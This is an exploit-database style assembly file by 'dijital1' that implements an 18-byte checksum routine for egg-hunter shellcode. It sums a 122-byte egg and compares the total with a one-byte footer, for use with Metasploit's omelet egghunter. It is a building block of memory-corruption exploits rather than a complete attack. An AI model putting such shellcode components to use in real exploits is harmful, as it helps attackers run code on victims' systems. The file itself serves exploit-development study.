;Exploit Title: Shellcode Checksum Routine ;Date: Sept 1 2010 ;Author: dijital1 ;Software Link: http://www.ciphermonk.net/code/exploits/shellcode-checksum.asm ;Tested on: Omelet Hunter Shellcode in MSF ;"|------------------------------------------------------------------|" ;"| __ __ |" ;"| _________ ________ / /___ _____ / /____ ____ _____ ___ |" ;"| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |" ;"| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |" ;"| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |" ;"| |" ;"| http://www.corelan.be:8800 |" ;"| security@corelan.be |" ;"| |" ;"|-------------------------------------------------[ EIP Hunters ]--|" ;" -= Egg Hunter Checksum Routine - dijital1 =- " [BITS 32] ;Author: Ron Henry - dijital1 ;Email: rlh@ciphermonk.net ;Site: http://www.ciphermonk.net ;Greetz to Exploit-db and Team Corelan ;Ok... couple of assumptions with this code. First, we're using a single ;byte as the checksum which gives us a 1 in 255 or ~0.39% chance of a ;collision. ;We consider this a worthwhile risk given the overall size of the code; 18 bytes. ;There are a couple ways to implement this, but a good example is how it ;was used in Peter Van Eeckhoutte's omelet egghunter mixin that was recently ;added to the Metasploit Framework. ;We're using a 1 byte footer at the end of the shellcode that contains the ;checksum generated at shellcode creation. ; Variables eax: accumulator ; edx: points to current byte in shellcode ; ecx: counter egg_size equ 0x7a ;we're testing 122 bytes in this instance find_egg: xor ecx, ecx ;zero the counter xor eax, eax ;zero the accumlator calc_chksum_loop: add al, byte [edx+ecx] ;add the byte to running total inc ecx ;increment the counter cmp cl, egg_size ;cmp counter to egg_size jnz calc_chksum_loop ;if it's not equal repeat test_ckksum: cmp al, byte [edx+ecx] ;cmp eax with 1 byte checksum jnz find_egg ;search for another egg if checksum is bogus